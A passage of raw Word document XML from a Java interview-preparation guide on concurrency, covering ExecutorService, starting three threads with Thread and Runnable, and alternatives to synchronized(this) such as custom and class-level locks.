        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4477A8"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lastRenderedPageBreak/>
        <w:t>public class ExecutorServiceExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AF4AF0"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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDAAA0A"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ExecutorService executorService = Executors.newFixedThreadPool(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B9F4BC" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EEA57D"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Submit 5 tasks to the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284F9A68"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for (int i = 0; i &lt; 5; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E35423"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executorService.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F79B5"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System.out.println("Task started by: " + Thread.currentThread().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D2165"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6746F748"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Thread.sleep(2000); // Simulate a task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28896BF6"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFF77F0"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Thread.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A8F52C"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6DD281A8"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System.out.println("Task finished by: " + Thread.currentThread().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC500CB"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03BC41D8"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6836A3A1" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13303F1E"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Shut down the executor after all tasks are completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF21D64"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executorService.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E67B6"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53BD778D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A02C2C" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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Key Methods of ExecutorService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CB668E" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>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ubmit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Accepts a Runnable or Callable and returns a Future object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2A35DF" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>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invokeAll()</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executes a collection of tasks and waits for all of them to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D616F25" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>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invokeAny()</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executes a collection of tasks and returns the result of the first completed task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF1D50D" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>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hutdown()</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initiates an orderly shutdown of the executor, rejecting any new tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4187422B" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>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hutdownNow()</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Attempts to stop all actively executing tasks and halts the processing of tasks waiting in the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D023B91" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B4229C" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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read Executors in Java provide a powerful and efficient way to handle concurrency. They abstract away the complexity of managing individual threads and offer more advanced features like thread pooling, task scheduling, and handling multiple tasks concurrently. The use of Executors can significantly simplify the process of concurrent programming while also improving performance and resource management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B93C44D" w14:textId="4888FDB4" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000962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46D19F0">
          <v:rect id="_x0000_i1863" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7493BC3B" w14:textId="77777777" w:rsidR="003A750E" w:rsidRPr="00CE4B95" w:rsidRDefault="003A750E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="292" w:name="_Toc196307772"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create three threads so that it will execute simultaneously?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="292"/>
    </w:p>
    <w:p w14:paraId="7A5B6A82" w14:textId="4E000B87" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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o create three threads that will execute simultaneously in Java, you can use either the Thread class or the Runnable interface. Here's an example using both approaches. Both threads will run concurrently, meaning the Java Virtual Machine (JVM) will manage them, and they will be executed on separate CPU cores or time slices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2011EA2D" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34"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Example Using Thread Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A517804"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You can create three Thread objects and start them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52763015"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class MyThread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1F6E6C"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDBE214"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ublic void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517CDF9F"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System.out.println(Thread.currentThread().getName() + " is executing.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9BC61B"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790BD07F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A9E68" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AABE8CE"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public class ThreeThreadsExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200EE554"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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76808DB8"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Create three threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC9D39D"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MyThread thread1 = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C80CF9"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MyThread thread2 = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A66542"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MyThread thread3 = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38873C51" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3721B0C4"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Start all three threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228711AB"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        thread1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD8505"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thread2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA4D7A0"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thread3.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF0E18D"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4D09C28D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A797D75" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34"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Example Using Runnable Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CEA9FF"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Alternatively, you can create a Runnable object and pass it to Thread objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C9A31"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class MyRunnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B941BB3"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF769F6"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ublic void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8C43A"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System.out.println(Thread.currentThread().getName() + " is executing.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7CD84F"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268336A0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D36F7F" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546906AB"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public class ThreeThreadsExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C31BC6A"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1616BB"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Create a runnable task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1972F72D"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Runnable task = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A813AE8" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ABDD402"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Create three threads with the runnable task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B48FC"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Thread thread1 = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ABD9EB"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Thread thread2 = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3D534"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Thread thread3 = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A6F4A5" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B044617"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Start all three threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E01CCC7"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thread1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619C1C4"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thread2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152B3D05"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thread3.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D0A0DD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB81307"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBEDE17" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015AFD96" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1258"/>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Thread Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can extend the Thread class by overriding its run() method. When you call start() on a thread, the run() method is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABF262E" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1258"/>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Runnable Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Alternatively, you can implement the Runnable interface, which also requires you to define the run() method. Then, you can pass the Runnable instance to a Thread and start the thread by calling start().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32287F84" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34"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How Java Executes Threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B0B0E6" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>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When you call start() on a thread, the JVM assigns the thread to an available CPU core (or time slice if there is only one core).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537F43C1" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>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reads run concurrently, so the exact order of execution is managed by the JVM scheduler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54571D53" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>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e threads will run "simultaneously" if there are multiple CPU cores available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0CEDAB" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34"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Expected Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64067DE7"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e output will vary in terms of the order in which the threads are executed because the JVM scheduler decides the execution sequence. Here's an example of what the output might look like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6818FD61"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read-0 is executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD52C0"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read-1 is executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771C416D"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read-2 is executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1206DCD9" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34"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e order can differ with each execution, as the JVM may schedule the threads in any order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C533A30" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34"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Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC169C" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1260"/>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reads may not always execute exactly simultaneously on a single-core machine, as the CPU time is sliced between threads. On multi-core machines, they can run simultaneously on different cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C29F9" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1260"/>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e JVM's thread scheduler controls when each thread is executed, and it may switch between them depending on factors like priority, I/O operations, or the availability of CPU resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C5466" w14:textId="63FAB0C5" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000962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FE2343C">
          <v:rect id="_x0000_i1864" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D786075" w14:textId="77777777" w:rsidR="00C134A5" w:rsidRPr="00CE4B95" w:rsidRDefault="00C134A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="293" w:name="_Toc196307773"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What can we replace instead of this keyword in the statement? synchronized(this) {?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="293"/>
    </w:p>
    <w:p w14:paraId="3213DD42" w14:textId="33146F65" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In the statement synchronized(this) {}, the this keyword refers to the current instance of the class. It is used to acquire a lock on the current object to ensure thread synchronization. However, instead of using this, you can use any other object to synchronize on, which will allow synchronization on a different lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1BFBCD"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Here are some alternatives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F97C49C" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using a Specific Lock Object (Custom Lock):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E660B"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Instead of using this, you can use a specific object for synchronization. This is a common practice to avoid potential deadlocks or unnecessary synchronization on the instance itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7D97DF"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public class MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79384B28"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private final Object lock = new Object(); // Custom lock object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA83530" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730D75C9"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public void myMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666C89E4"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synchronized(lock) { // Synchronize using the lock object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF2E2FE"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 Critical section code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFB0B15"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E4F22F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2BA87A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EB1B07"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Why use a custom lock?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7892B1" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using a custom lock object (like lock in this case) is often preferred because it avoids synchronizing on the object itself (this), which may already be used for other synchronization elsewhere in the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA05E27" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This helps in achieving finer-grained control over which resources or sections of code are synchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0948CD72" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using Class-level Lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FE48A2"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If you want to synchronize on the class level (static synchronization), you can use the Class object of the class itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E354DDC"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public class MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF8D70D"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public static void myStaticMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5ED74E"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synchronized(MyClass.class) { // Synchronize on the class object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67768D0C"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 Critical section code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0DEAAA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F0456A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3BC31"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72775E9E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Why use MyClass.class?</w:t>
      </w:r>
    </w:p>
